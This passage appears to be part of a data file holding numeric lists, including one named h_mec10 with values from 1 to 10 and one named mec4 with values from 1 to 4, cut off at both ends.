4.0, 2.0, 6.0, 4.0, 1.0, 4.0, 3.0, 7.0, 6.0, 1.0, 6.0, 3.0, 5.0, 1.0, 4.0, 3.0, 6.0, 3.0, 6.0, 4.0, 2.0, 2.0, 3.0, 4.0, 6.0, 4.0, 2.0, 1.0, 2.0, 6.0, 2.0, 2.0, 3.0, 1.0, 2.0, 4.0, 2.0, 1.0, 2.0, 3.0, 7.0, 6.0, 4.0, 1.0, 4.0, 1.0, 5.0, 2.0, 7.0, 6.0, 4.0, 3.0, 4.0, 4.0, 4.0, 1.0, 6.0, 2.0, 6.0, 3.0, 2.0, 6.0, 6.0, 1.0, 1.0, 3.0, 6.0, 4.0, 4.0, 4.0, 3.0, 4.0, 4.0, 3.0, 1.0, 4.0, 6.0, 3.0, 2.0, 4.0, 6.0, 2.0, 3.0, 7.0, 5.0, 4.0, 1.0, 5.0, 6.0, 2.0, 4.0, 1.0, 5.0, 4.0, 7.0, 6.0, 6.0, 5.0, 2.0, 6.0, 3.0, 5.0, 4.0, 2.0, 6.0, 6.0, 4.0, 1.0, 4.0, 5.0, 6.0, 3.0, 4.0, 1.0, 2.0, 6.0, 2.0, 6.0, 1.0, 1.0, 1.0, 4.0, 1.0, 4.0, 1.0, 6.0, 1.0, 3.0, 3.0, 1.0, 1.0, 3.0, 3.0, 5.0, 7.0, 1.0, 4.0, 1.0, 7.0, 1.0, 5.0, 2.0, 2.0, 2.0, 6.0]
h_mec10 = [9.0, 6.0, 6.0, 5.0, 3.0, 3.0, 9.0, 5.0, 5.0, 1.0, 2.0, 8.0, 8.0, 2.0, 9.0, 5.0, 2.0, 9.0, 3.0, 1.0, 9.0, 6.0, 8.0, 8.0, 10.0, 4.0, 2.0, 6.0, 6.0, 4.0, 2.0, 5.0, 8.0, 5.0, 9.0, 1.0, 10.0, 6.0, 8.0, 8.0, 6.0, 1.0, 4.0, 2.0, 1.0, 4.0, 1.0, 6.0, 5.0, 3.0, 3.0, 1.0, 8.0, 5.0, 4.0, 5.0, 5.0, 2.0, 8.0, 10.0, 8.0, 8.0, 5.0, 9.0, 4.0, 6.0, 9.0, 4.0, 5.0, 8.0, 6.0, 3.0, 5.0, 3.0, 9.0, 6.0, 4.0, 3.0, 9.0, 2.0, 7.0, 8.0, 8.0, 4.0, 10.0, 6.0, 5.0, 3.0, 9.0, 7.0, 7.0, 5.0, 4.0, 6.0, 1.0, 6.0, 9.0, 2.0, 5.0, 2.0, 9.0, 9.0, 6.0, 9.0, 6.0, 8.0, 8.0, 2.0, 2.0, 9.0, 5.0, 2.0, 1.0, 9.0, 3.0, 8.0, 6.0, 5.0, 7.0, 3.0, 10.0, 5.0, 10.0, 1.0, 1.0, 8.0, 9.0, 2.0, 5.0, 5.0, 3.0, 8.0, 9.0, 9.0, 8.0, 1.0, 9.0, 6.0, 8.0, 3.0, 4.0, 9.0, 1.0, 2.0, 7.0, 6.0, 8.0, 4.0, 5.0, 10.0, 5.0, 3.0, 1.0, 6.0, 8.0, 7.0, 8.0, 1.0, 10.0, 6.0, 6.0, 1.0, 6.0, 6.0, 6.0, 3.0, 8.0, 1.0, 8.0, 1.0, 2.0, 6.0, 2.0, 8.0, 1.0, 5.0, 10.0, 6.0, 3.0, 6.0, 1.0, 1.0, 4.0, 5.0, 3.0, 4.0, 7.0, 5.0, 1.0, 1.0, 1.0, 6.0, 8.0, 8.0, 6.0, 3.0, 9.0, 4.0, 5.0, 8.0, 8.0, 1.0, 1.0, 9.0, 1.0, 1.0, 10.0, 5.0, 7.0, 10.0, 6.0, 3.0, 7.0, 5.0, 4.0, 5.0, 5.0, 9.0, 8.0, 5.0, 2.0, 8.0, 8.0, 5.0, 9.0, 4.0, 3.0, 1.0, 5.0, 6.0, 9.0, 9.0, 9.0, 4.0, 8.0, 5.0, 5.0, 6.0, 3.0, 9.0, 4.0, 5.0, 5.0, 9.0, 1.0, 8.0, 8.0, 1.0, 9.0, 4.0, 5.0, 3.0, 3.0, 7.0, 4.0, 2.0, 6.0, 8.0, 7.0, 9.0, 10.0, 9.0, 1.0, 8.0, 7.0, 10.0, 6.0, 8.0, 7.0, 1.0, 9.0, 10.0, 3.0, 3.0, 5.0, 5.0, 5.0, 6.0, 9.0, 1.0, 6.0, 10.0, 9.0, 8.0, 10.0, 8.0, 8.0, 9.0, 3.0, 6.0, 1.0, 9.0, 6.0, 4.0, 8.0, 2.0, 8.0, 8.0, 6.0, 9.0, 2.0, 2.0, 4.0, 3.0, 6.0, 6.0, 2.0, 1.0, 4.0, 1.0, 1.0, 1.0, 1.0, 2.0, 9.0, 1.0, 9.0, 9.0, 5.0, 9.0, 5.0, 5.0, 3.0, 2.0, 10.0, 7.0, 8.0, 4.0, 8.0, 2.0, 8.0, 4.0, 4.0, 4.0, 1.0, 8.0, 1.0, 5.0, 1.0, 3.0, 1.0, 8.0, 10.0, 4.0, 9.0, 7.0, 1.0, 8.0, 8.0, 1.0, 6.0, 4.0, 5.0, 3.0, 1.0, 3.0, 5.0, 8.0, 8.0, 8.0, 1.0, 3.0, 4.0, 1.0, 6.0, 6.0, 5.0, 9.0, 6.0, 4.0, 3.0, 9.0, 5.0, 1.0, 8.0, 9.0, 6.0, 8.0, 3.0, 10.0, 7.0, 3.0, 1.0, 6.0, 6.0, 6.0, 1.0, 5.0, 9.0, 9.0, 1.0, 4.0, 9.0, 1.0, 2.0, 1.0, 1.0, 3.0, 5.0, 1.0, 2.0, 9.0, 5.0, 5.0, 4.0, 9.0, 6.0, 3.0, 2.0, 4.0, 8.0, 5.0, 5.0, 2.0, 10.0, 8.0, 3.0, 8.0, 5.0, 7.0, 9.0, 6.0, 5.0, 6.0, 1.0, 3.0, 3.0, 3.0, 6.0, 4.0, 6.0, 10.0, 5.0, 1.0, 3.0, 6.0, 8.0, 10.0, 3.0, 8.0, 6.0, 5.0, 6.0, 2.0, 8.0, 4.0, 8.0, 10.0, 4.0, 7.0, 6.0, 6.0, 10.0, 8.0, 3.0, 3.0, 10.0, 8.0, 5.0, 4.0, 5.0, 8.0, 4.0, 7.0, 7.0, 8.0, 8.0, 1.0, 10.0, 8.0, 6.0, 5.0, 10.0, 1.0, 9.0, 10.0, 1.0, 6.0, 3.0, 1.0, 2.0, 6.0, 9.0, 4.0, 7.0, 5.0, 1.0, 5.0, 9.0, 10.0, 5.0, 9.0, 3.0, 8.0, 6.0, 4.0, 6.0, 5.0, 2.0, 9.0, 5.0, 5.0, 2.0, 9.0, 1.0, 10.0, 5.0, 5.0, 1.0, 9.0, 6.0, 9.0, 5.0, 8.0, 1.0, 8.0, 4.0, 5.0, 9.0, 7.0, 1.0, 1.0, 9.0, 6.0, 9.0, 6.0, 9.0, 7.0, 6.0, 3.0, 8.0, 4.0, 6.0, 1.0, 4.0, 6.0, 9.0, 8.0, 1.0, 6.0, 9.0, 8.0, 4.0, 1.0, 6.0, 1.0, 6.0, 9.0, 3.0, 1.0, 6.0, 8.0, 2.0, 7.0, 5.0, 9.0, 2.0, 4.0, 10.0, 6.0, 8.0, 10.0, 7.0, 1.0, 2.0, 10.0, 4.0, 4.0, 3.0, 9.0, 10.0, 9.0, 6.0, 4.0, 8.0, 4.0, 5.0, 10.0, 3.0, 7.0, 4.0, 1.0, 5.0, 6.0, 2.0, 5.0, 8.0, 1.0, 1.0, 8.0, 5.0, 3.0, 1.0, 8.0, 10.0, 5.0, 1.0, 3.0, 9.0, 5.0, 6.0, 10.0, 1.0, 1.0, 10.0, 7.0, 8.0, 3.0, 9.0, 8.0, 4.0, 10.0, 8.0, 10.0, 8.0, 6.0, 3.0, 9.0, 4.0, 2.0, 7.0, 8.0, 3.0, 1.0, 8.0, 3.0, 1.0, 10.0, 7.0, 9.0, 6.0, 2.0, 10.0, 3.0, 4.0, 10.0, 10.0, 1.0, 1.0, 3.0, 1.0, 6.0, 10.0, 10.0, 8.0, 6.0, 5.0, 6.0, 2.0, 9.0, 8.0, 3.0, 9.0, 8.0, 5.0, 6.0, 1.0, 9.0, 8.0, 2.0, 6.0, 9.0, 10.0, 1.0, 6.0, 3.0, 8.0, 10.0, 8.0, 2.0, 4.0, 4.0, 4.0, 5.0, 7.0, 8.0, 3.0, 5.0, 10.0, 10.0, 8.0, 3.0, 6.0, 9.0, 9.0, 2.0, 2.0, 8.0, 8.0, 5.0, 8.0, 8.0, 5.0, 5.0, 4.0, 4.0, 4.0, 8.0, 10.0, 8.0, 7.0, 1.0, 2.0, 3.0, 1.0, 1.0, 1.0, 8.0, 10.0, 6.0, 6.0, 1.0, 9.0, 8.0, 1.0, 10.0, 9.0, 5.0, 3.0, 9.0, 9.0, 8.0, 6.0, 9.0, 9.0, 4.0, 4.0, 6.0, 3.0, 2.0, 3.0, 4.0, 6.0, 4.0, 8.0, 6.0, 7.0, 4.0, 9.0, 3.0, 9.0, 8.0, 4.0, 1.0, 5.0, 9.0, 9.0, 4.0, 1.0, 3.0, 7.0, 9.0, 10.0, 3.0, 5.0, 7.0, 3.0, 3.0, 5.0, 2.0, 4.0, 4.0, 4.0, 1.0, 8.0, 8.0, 9.0, 3.0, 9.0, 7.0, 10.0, 8.0, 10.0, 8.0, 8.0, 7.0, 5.0, 3.0, 3.0, 7.0, 8.0, 4.0, 5.0, 9.0, 1.0, 2.0, 3.0, 6.0, 5.0, 4.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 8.0, 6.0, 8.0, 10.0, 6.0, 1.0, 1.0, 2.0, 7.0, 5.0, 5.0, 10.0, 3.0, 6.0, 5.0, 8.0, 8.0, 6.0, 8.0, 10.0, 2.0, 1.0, 9.0, 1.0, 1.0, 4.0, 3.0, 1.0, 6.0, 7.0, 10.0, 4.0, 4.0, 8.0, 3.0, 8.0, 9.0, 3.0, 1.0, 9.0, 8.0, 5.0, 1.0, 4.0, 1.0, 2.0, 4.0, 5.0, 4.0, 6.0, 10.0, 2.0, 6.0, 8.0, 7.0, 5.0, 5.0, 1.0, 7.0, 4.0, 4.0, 4.0, 6.0, 1.0, 6.0, 8.0, 9.0, 8.0, 6.0, 6.0, 7.0, 5.0, 9.0, 9.0, 4.0, 8.0, 6.0, 4.0, 4.0, 1.0, 9.0, 4.0, 10.0, 6.0, 5.0, 1.0, 10.0, 4.0, 6.0, 1.0, 8.0, 4.0, 1.0, 5.0, 5.0, 2.0, 4.0, 1.0, 7.0, 1.0, 7.0, 9.0, 1.0, 9.0, 3.0, 4.0, 10.0, 1.0, 9.0, 2.0, 9.0, 5.0, 5.0, 3.0, 8.0, 2.0, 9.0, 8.0, 8.0, 8.0, 9.0, 3.0, 1.0, 9.0, 3.0, 9.0, 1.0, 2.0, 5.0, 3.0, 3.0, 8.0, 4.0, 9.0, 1.0, 4.0, 4.0, 9.0, 1.0, 2.0, 2.0, 4.0, 5.0, 8.0, 1.0, 2.0, 5.0, 5.0, 6.0, 9.0, 10.0, 6.0, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0, 4.0, 9.0, 1.0, 5.0, 9.0, 1.0, 3.0, 2.0, 5.0, 5.0, 7.0, 1.0, 4.0, 4.0, 5.0, 1.0, 8.0, 1.0, 4.0, 3.0, 1.0, 8.0, 4.0, 8.0, 9.0, 9.0, 9.0, 6.0, 9.0, 6.0, 6.0, 8.0, 2.0, 9.0, 7.0, 1.0, 4.0, 6.0, 3.0, 4.0, 5.0, 8.0, 4.0, 6.0, 6.0, 6.0, 2.0, 4.0, 1.0, 3.0, 8.0, 3.0, 2.0, 10.0, 9.0, 10.0, 10.0, 3.0, 1.0, 7.0, 2.0, 7.0, 2.0, 4.0, 7.0, 6.0, 7.0, 7.0, 1.0, 10.0, 8.0, 8.0, 3.0, 6.0, 7.0, 4.0, 9.0, 4.0, 6.0, 7.0, 10.0, 8.0, 10.0, 9.0, 9.0, 5.0, 4.0, 5.0, 9.0, 1.0, 4.0, 8.0, 8.0, 1.0, 5.0, 8.0, 8.0, 9.0, 5.0, 7.0, 1.0, 10.0, 6.0, 2.0, 1.0, 8.0, 8.0, 3.0, 1.0, 1.0, 5.0, 9.0, 6.0, 8.0, 7.0, 1.0, 2.0, 9.0, 2.0, 8.0, 7.0, 8.0, 2.0, 1.0, 2.0, 4.0, 6.0, 9.0, 4.0, 3.0, 9.0, 5.0, 1.0, 9.0, 1.0, 6.0, 8.0, 1.0, 8.0, 9.0, 8.0, 4.0, 1.0, 5.0, 9.0, 4.0, 2.0, 8.0, 9.0, 6.0, 7.0, 5.0, 9.0, 1.0, 8.0, 8.0, 8.0, 8.0, 5.0, 6.0, 2.0, 1.0, 9.0, 9.0, 4.0, 5.0, 1.0, 1.0, 4.0, 5.0, 2.0, 3.0, 9.0, 2.0, 1.0, 2.0, 5.0, 4.0, 4.0, 5.0, 4.0, 1.0, 9.0, 6.0, 1.0, 6.0, 5.0, 6.0, 1.0, 1.0, 8.0, 4.0, 6.0, 3.0, 3.0, 6.0, 4.0, 6.0, 3.0, 5.0, 1.0, 8.0, 2.0, 3.0, 5.0, 9.0, 1.0, 1.0, 9.0, 1.0, 8.0, 5.0, 4.0, 4.0, 9.0, 1.0, 10.0, 8.0, 3.0, 2.0, 4.0, 5.0, 3.0, 6.0, 5.0, 9.0, 6.0, 3.0, 9.0, 5.0, 4.0, 6.0, 3.0, 5.0, 1.0, 9.0, 2.0, 6.0, 6.0, 2.0, 1.0, 9.0, 2.0, 1.0, 10.0, 9.0, 1.0, 5.0, 8.0, 5.0, 9.0, 3.0, 9.0, 9.0, 5.0, 6.0, 1.0, 6.0, 6.0, 6.0, 5.0, 3.0, 3.0, 5.0, 5.0, 5.0, 9.0, 1.0, 5.0, 6.0, 8.0, 5.0, 2.0, 3.0, 6.0, 9.0, 6.0, 4.0, 4.0, 1.0, 8.0, 5.0, 8.0, 1.0, 9.0, 9.0, 2.0, 1.0, 1.0, 1.0, 3.0, 7.0, 4.0, 6.0, 4.0, 10.0, 8.0, 10.0, 6.0, 3.0, 6.0, 5.0, 2.0, 7.0, 8.0, 3.0, 5.0, 4.0, 4.0, 8.0, 3.0, 2.0, 5.0, 9.0, 8.0, 4.0, 4.0, 8.0, 9.0, 9.0, 5.0, 5.0, 1.0, 2.0, 4.0, 9.0, 1.0, 6.0, 3.0, 9.0, 8.0, 10.0, 5.0, 4.0, 7.0, 9.0, 1.0, 3.0, 6.0, 1.0, 5.0, 6.0, 9.0, 1.0, 5.0, 9.0, 6.0, 4.0, 1.0, 9.0, 9.0, 9.0, 8.0, 1.0, 6.0, 3.0, 1.0, 9.0, 5.0, 1.0, 1.0, 9.0, 8.0, 3.0, 10.0, 7.0, 9.0, 1.0, 5.0, 5.0, 6.0, 10.0, 9.0, 9.0, 8.0, 2.0, 6.0, 6.0, 3.0, 9.0, 1.0, 2.0, 6.0, 4.0, 10.0, 3.0, 2.0, 9.0, 8.0, 3.0, 5.0, 9.0, 6.0, 1.0, 8.0, 1.0, 3.0, 4.0, 5.0, 5.0, 8.0, 9.0, 1.0, 4.0, 9.0, 8.0, 9.0, 5.0, 3.0, 3.0, 6.0, 3.0, 3.0, 6.0, 2.0, 9.0, 6.0, 6.0, 9.0, 3.0, 1.0, 9.0, 4.0, 1.0, 9.0, 9.0, 3.0, 2.0, 2.0, 1.0, 6.0, 2.0, 6.0, 3.0, 1.0, 3.0, 2.0, 9.0, 9.0, 1.0, 1.0, 9.0, 1.0, 3.0, 1.0, 2.0, 3.0, 4.0, 9.0, 1.0, 6.0, 5.0, 1.0, 2.0, 8.0, 1.0, 5.0, 7.0, 3.0, 3.0, 3.0, 1.0, 4.0, 1.0, 9.0, 8.0, 1.0, 7.0, 2.0, 9.0, 3.0, 2.0, 3.0, 4.0, 9.0, 7.0, 3.0, 9.0, 5.0, 8.0, 1.0, 5.0, 2.0, 2.0, 5.0, 2.0, 9.0, 1.0, 3.0, 9.0, 9.0, 8.0, 7.0, 4.0, 6.0, 1.0, 1.0, 5.0, 3.0, 8.0, 6.0, 6.0, 1.0, 6.0, 8.0, 1.0, 9.0, 8.0, 8.0, 10.0, 6.0, 4.0, 10.0, 1.0, 4.0, 9.0, 8.0, 9.0, 9.0, 5.0, 1.0, 4.0, 2.0, 5.0, 3.0, 6.0, 1.0, 3.0, 10.0, 3.0, 1.0, 5.0, 4.0, 9.0, 10.0, 2.0, 4.0, 1.0, 8.0, 4.0, 3.0, 8.0, 5.0, 8.0, 1.0, 3.0, 9.0, 9.0, 1.0, 6.0, 6.0, 4.0, 10.0, 8.0, 5.0, 7.0, 2.0, 7.0, 4.0, 5.0, 3.0, 1.0, 4.0, 3.0, 1.0, 9.0, 4.0, 6.0, 4.0, 5.0, 8.0, 8.0, 4.0, 9.0, 1.0, 6.0, 4.0, 9.0, 1.0, 1.0, 8.0, 8.0, 8.0, 1.0, 8.0, 2.0, 1.0, 10.0, 1.0, 1.0, 8.0, 4.0, 4.0, 10.0, 4.0, 9.0, 4.0, 8.0, 6.0, 3.0, 9.0, 5.0, 8.0, 4.0, 3.0, 6.0, 4.0, 10.0, 5.0, 5.0, 3.0, 4.0, 2.0, 4.0, 3.0, 6.0, 6.0, 2.0, 8.0, 6.0, 5.0, 5.0, 7.0, 5.0, 9.0, 9.0, 4.0, 1.0, 7.0, 1.0, 4.0, 8.0, 5.0, 8.0, 10.0, 4.0, 8.0, 6.0, 9.0, 3.0, 4.0, 9.0, 1.0, 1.0, 1.0, 10.0, 8.0, 8.0, 3.0, 8.0, 4.0, 4.0, 3.0, 10.0, 6.0, 5.0, 9.0, 1.0, 6.0, 9.0, 2.0, 3.0, 6.0, 6.0, 8.0, 2.0, 5.0, 1.0, 3.0, 1.0, 4.0, 1.0, 4.0, 1.0, 8.0, 6.0, 5.0, 1.0, 9.0, 1.0, 6.0, 3.0, 3.0, 4.0, 10.0, 5.0, 6.0, 3.0, 10.0, 7.0, 2.0, 1.0, 5.0, 6.0, 8.0, 9.0, 9.0, 4.0, 4.0, 4.0, 4.0, 2.0, 4.0, 9.0, 6.0, 4.0, 2.0, 5.0, 6.0, 3.0, 9.0, 3.0, 5.0, 6.0, 10.0, 3.0, 10.0, 4.0, 3.0, 7.0, 2.0, 5.0, 1.0, 1.0, 1.0, 1.0, 5.0, 6.0, 2.0, 2.0, 9.0, 4.0, 2.0, 9.0, 4.0, 9.0, 2.0, 2.0, 3.0, 3.0, 3.0, 8.0, 5.0, 8.0, 9.0, 10.0, 1.0, 6.0, 2.0, 10.0, 8.0, 1.0, 1.0, 4.0, 3.0, 3.0, 1.0, 5.0, 8.0, 5.0, 8.0, 1.0, 9.0, 1.0, 4.0, 8.0, 8.0, 3.0, 10.0, 6.0, 6.0, 8.0, 3.0, 7.0, 5.0, 5.0, 10.0, 1.0, 4.0, 9.0, 4.0, 10.0, 10.0, 2.0, 8.0, 5.0, 6.0, 9.0, 3.0, 4.0, 8.0, 2.0, 9.0, 6.0, 8.0, 8.0, 3.0, 10.0, 8.0, 8.0, 8.0, 10.0, 5.0, 8.0, 8.0, 6.0, 4.0, 9.0, 4.0, 1.0, 4.0, 9.0, 9.0, 5.0, 5.0, 4.0, 9.0, 7.0, 1.0, 8.0, 1.0, 6.0, 4.0, 10.0, 9.0, 2.0, 4.0, 2.0, 2.0, 3.0, 4.0, 6.0, 2.0, 9.0, 8.0, 1.0, 7.0, 4.0, 2.0, 1.0, 9.0, 8.0, 9.0, 3.0, 9.0, 3.0, 10.0, 5.0, 6.0, 1.0, 8.0, 6.0, 1.0, 8.0, 9.0, 6.0, 9.0, 6.0, 6.0, 5.0, 3.0, 1.0, 9.0, 8.0, 9.0, 2.0, 8.0, 9.0, 9.0, 8.0, 6.0, 3.0, 4.0, 6.0, 3.0, 2.0, 4.0, 10.0, 8.0, 1.0, 2.0, 1.0, 4.0, 8.0, 2.0, 10.0, 5.0, 6.0, 5.0, 2.0, 1.0, 5.0, 4.0, 1.0, 10.0, 3.0, 3.0, 5.0, 9.0, 6.0, 10.0, 10.0, 9.0, 9.0, 3.0, 7.0, 5.0, 2.0, 5.0, 6.0, 9.0, 4.0, 4.0, 6.0, 1.0, 6.0, 5.0, 1.0, 8.0, 9.0, 1.0, 9.0, 8.0, 4.0, 3.0, 9.0, 5.0, 5.0, 8.0, 10.0, 3.0, 2.0, 9.0, 7.0, 4.0, 7.0, 2.0, 2.0, 9.0, 8.0, 6.0, 2.0, 5.0, 1.0, 5.0, 9.0, 2.0, 1.0, 2.0, 8.0, 9.0, 3.0, 2.0, 1.0, 1.0, 2.0, 2.0, 1.0, 6.0, 8.0, 2.0, 4.0, 10.0, 4.0, 1.0, 8.0, 3.0, 9.0, 3.0, 5.0, 2.0, 6.0, 1.0, 6.0, 4.0, 8.0, 6.0, 1.0, 3.0, 3.0, 1.0, 5.0, 2.0, 3.0, 6.0, 9.0, 9.0, 9.0, 9.0, 1.0, 2.0, 1.0, 1.0, 8.0, 1.0, 5.0, 1.0, 6.0, 5.0, 5.0, 9.0, 3.0, 9.0, 1.0, 5.0, 8.0, 5.0, 9.0, 5.0, 6.0, 2.0, 8.0, 7.0, 1.0, 2.0, 3.0, 8.0, 1.0, 8.0, 2.0, 1.0, 8.0, 9.0, 9.0, 6.0, 4.0, 4.0, 1.0, 9.0, 9.0, 4.0, 5.0, 7.0, 9.0, 4.0, 3.0, 6.0, 3.0, 4.0, 7.0, 4.0, 8.0, 2.0, 2.0, 10.0, 4.0, 9.0, 8.0, 1.0, 1.0, 9.0, 1.0, 10.0, 8.0, 4.0, 1.0, 4.0, 1.0, 9.0, 2.0, 2.0, 5.0, 6.0, 10.0, 1.0, 10.0, 4.0, 6.0, 6.0, 5.0, 9.0, 8.0, 8.0, 1.0, 9.0, 8.0, 2.0, 6.0, 10.0, 9.0, 8.0, 9.0, 9.0, 5.0, 2.0, 3.0, 8.0, 8.0, 2.0, 10.0, 7.0, 1.0, 9.0, 6.0, 9.0, 5.0, 10.0, 2.0, 10.0, 1.0, 6.0, 1.0, 4.0, 4.0, 10.0, 5.0, 5.0, 1.0, 9.0, 1.0, 4.0, 10.0, 10.0, 5.0, 9.0, 10.0, 4.0, 1.0, 5.0, 5.0, 5.0, 7.0, 9.0, 4.0, 2.0, 4.0, 4.0, 2.0, 2.0, 1.0, 1.0, 3.0, 5.0, 9.0, 2.0, 10.0, 4.0, 5.0, 10.0, 8.0, 3.0, 1.0, 10.0, 9.0, 1.0, 6.0, 5.0, 1.0, 3.0, 8.0, 5.0, 6.0, 4.0, 4.0, 2.0, 4.0, 3.0, 9.0, 7.0, 8.0, 1.0, 1.0, 9.0, 8.0, 2.0, 4.0, 8.0, 1.0, 8.0, 10.0, 8.0, 1.0, 9.0, 9.0, 3.0, 4.0, 10.0, 5.0, 2.0, 5.0, 8.0, 9.0, 6.0, 10.0, 1.0, 3.0, 5.0, 9.0, 8.0, 6.0, 9.0, 9.0, 2.0, 4.0, 8.0, 8.0, 3.0, 9.0, 6.0, 6.0, 1.0, 2.0, 9.0, 2.0, 10.0, 1.0, 1.0, 1.0, 4.0, 9.0, 9.0, 3.0, 8.0, 3.0, 4.0, 7.0, 9.0, 3.0, 8.0, 9.0, 3.0, 3.0, 7.0, 9.0, 9.0, 4.0, 3.0, 1.0, 6.0, 9.0, 1.0, 6.0, 4.0, 9.0, 4.0, 5.0, 2.0, 3.0, 4.0, 9.0, 9.0, 1.0, 1.0, 4.0, 6.0, 8.0, 10.0, 1.0, 8.0, 1.0, 4.0, 2.0, 1.0, 8.0, 9.0, 8.0, 4.0, 8.0, 8.0, 5.0, 1.0, 6.0, 5.0, 4.0, 9.0, 1.0, 8.0, 4.0, 4.0, 6.0, 8.0, 1.0, 9.0, 5.0, 5.0, 1.0, 9.0, 10.0, 2.0, 7.0, 10.0, 2.0, 5.0, 9.0, 7.0, 4.0, 3.0, 9.0, 5.0, 9.0, 9.0, 7.0, 10.0, 9.0, 9.0, 10.0, 7.0, 4.0, 4.0, 3.0, 8.0, 3.0, 4.0, 9.0, 2.0, 6.0, 9.0, 4.0, 6.0, 1.0, 8.0, 4.0, 1.0, 9.0, 10.0, 3.0, 9.0, 2.0, 5.0, 2.0, 3.0, 4.0, 1.0, 5.0, 6.0, 9.0, 6.0, 9.0, 6.0, 8.0, 9.0, 8.0, 5.0, 2.0, 1.0, 3.0, 1.0, 10.0, 5.0, 2.0, 6.0, 9.0, 9.0, 4.0, 3.0, 5.0, 5.0, 6.0, 3.0, 9.0, 10.0, 6.0, 9.0, 3.0, 3.0, 3.0, 5.0, 5.0, 4.0, 1.0, 8.0, 3.0, 1.0, 6.0, 9.0, 6.0, 10.0, 5.0, 1.0, 9.0, 8.0, 5.0, 6.0, 8.0, 4.0, 6.0, 6.0, 9.0, 6.0, 4.0, 8.0, 5.0, 10.0, 2.0, 4.0, 4.0, 1.0, 6.0, 8.0, 6.0, 3.0, 1.0, 1.0, 1.0, 3.0, 4.0, 5.0, 9.0, 4.0, 6.0, 9.0, 7.0, 9.0, 6.0, 5.0, 5.0, 2.0, 2.0, 6.0, 3.0, 9.0, 6.0, 4.0, 8.0, 9.0, 5.0, 3.0, 8.0, 4.0, 8.0, 7.0, 5.0, 9.0, 6.0, 2.0, 3.0, 6.0, 3.0, 9.0, 10.0, 4.0, 1.0, 5.0, 5.0, 8.0, 9.0, 6.0, 4.0, 4.0, 9.0, 9.0, 2.0, 1.0, 7.0, 9.0, 5.0, 9.0, 6.0, 2.0, 2.0, 4.0, 7.0, 8.0, 3.0, 9.0, 8.0, 2.0, 1.0, 5.0, 1.0, 2.0, 5.0, 6.0, 9.0, 1.0, 1.0, 5.0, 4.0, 3.0, 8.0, 6.0, 9.0, 10.0, 4.0, 7.0, 9.0, 3.0, 1.0, 1.0, 3.0, 6.0, 10.0, 9.0, 5.0, 9.0, 3.0, 4.0, 5.0, 4.0, 8.0, 1.0, 9.0, 8.0, 1.0, 5.0, 7.0, 8.0, 6.0, 2.0, 4.0, 8.0, 8.0, 5.0, 3.0, 3.0, 2.0, 1.0, 3.0, 3.0, 9.0, 5.0, 6.0, 9.0, 8.0, 2.0, 9.0, 5.0, 1.0, 1.0, 6.0, 1.0, 5.0, 1.0, 4.0, 9.0, 3.0, 1.0, 8.0, 6.0, 3.0, 6.0, 4.0, 1.0, 4.0, 3.0, 9.0, 10.0, 1.0, 10.0, 5.0, 8.0, 9.0, 2.0, 3.0, 8.0, 8.0, 9.0, 3.0, 9.0, 5.0, 4.0, 6.0, 1.0, 10.0, 5.0, 8.0, 8.0, 1.0, 7.0, 4.0, 4.0, 10.0, 1.0, 2.0, 4.0, 3.0, 4.0, 4.0, 8.0, 8.0, 3.0, 3.0, 6.0, 2.0, 9.0, 4.0, 6.0, 6.0, 7.0, 8.0, 5.0, 8.0, 5.0, 2.0, 4.0, 9.0, 6.0, 6.0, 3.0, 4.0, 3.0, 1.0, 1.0, 9.0, 5.0, 3.0, 5.0, 5.0, 10.0, 2.0, 4.0, 8.0, 8.0, 1.0, 8.0, 10.0, 1.0, 9.0, 8.0, 6.0, 8.0, 9.0, 4.0, 4.0, 3.0, 2.0, 4.0, 4.0, 4.0, 10.0, 1.0, 8.0, 9.0, 6.0, 4.0, 1.0, 2.0, 1.0, 1.0, 6.0, 9.0, 4.0, 1.0, 3.0, 9.0, 6.0, 1.0, 6.0, 3.0, 2.0, 6.0, 8.0, 1.0, 4.0, 5.0, 2.0]
mec4 = [4, 3, 1, 2, 2, 4, 3, 1, 4, 4, 4, 2, 3, 4, 1, 4, 2, 1, 1, 1, 2, 4, 4, 1, 4, 4, 1, 2, 1, 1, 2, 2, 3, 2, 1, 2, 2, 3, 2, 2, 4, 2, 2, 3, 1, 1, 1, 1, 1, 1, 1, 1, 4, 4, 3, 4, 4, 2, 2, 1, 3, 3, 1, 1, 1, 4, 4, 3, 3, 2, 2, 2, 2, 2, 4, 1, 2, 4, 1, 2, 2, 1, 3, 1, 4, 4, 4, 4, 4, 3, 4, 3, 3, 1, 3, 1, 3, 1, 3, 3, 2, 1, 3, 4, 2, 3, 2, 2, 4, 1, 3, 1, 1, 2, 1, 2, 2, 3, 3, 3, 4, 4, 2, 2, 1, 4, 3, 2, 2, 2, 1, 2, 4, 4, 3, 4, 1, 2, 3, 3, 2, 3, 4, 1, 2, 1, 2, 2, 3, 1, 2, 1, 2, 1, 2, 4, 1, 2, 3, 1, 3, 3, 3, 3, 1, 3, 3, 2, 4, 1, 2, 4, 3, 2, 2, 4, 3, 3, 2, 1, 2, 1, 2, 1, 2, 3, 4, 1, 4, 1, 3, 2, 1, 3, 4, 1, 1, 2, 2, 1, 2, 2, 4, 4, 2, 2, 2, 3, 4, 4, 3, 3, 1, 4, 2, 1, 2, 4, 4, 3, 2, 4, 2, 4, 1, 2, 3, 3, 1, 4, 3, 1, 4, 2, 2, 1, 3, 1, 2, 2, 3, 4, 4, 3, 1, 3, 2, 3, 2, 2, 1, 1, 2, 1, 4, 2, 2, 4, 1, 2, 2, 2, 1, 2, 2, 3, 3, 1, 1, 2, 1, 4, 1, 4, 4, 4, 3, 3, 4, 2, 1, 1, 1, 1, 4, 1, 1, 4, 2, 3, 4, 1, 3, 2, 4, 1, 3, 4, 1, 4, 4, 4, 1, 1, 2, 3, 2, 1, 2, 4, 1, 3, 3, 2, 2, 3, 1, 1, 2, 4, 3, 2, 3, 1, 3, 1, 4, 2, 2, 2, 1, 1, 2, 3, 1, 2, 1, 1, 4, 1, 1, 1, 3, 3, 1, 4, 1, 3, 1, 2, 3, 2, 1, 3, 4, 1, 3, 3, 1, 2, 1, 2, 4, 4, 3, 3, 2, 2, 2, 3, 4, 4, 3, 1, 3, 1, 2, 3, 4, 4, 1, 1, 3, 1, 3, 3, 1, 3, 4, 1, 4, 1, 3, 2, 4, 1, 4, 4, 3, 2, 3, 3, 1, 4, 4, 3, 3, 1, 2, 3, 1, 4, 1, 3, 2, 3, 4, 4, 3, 3, 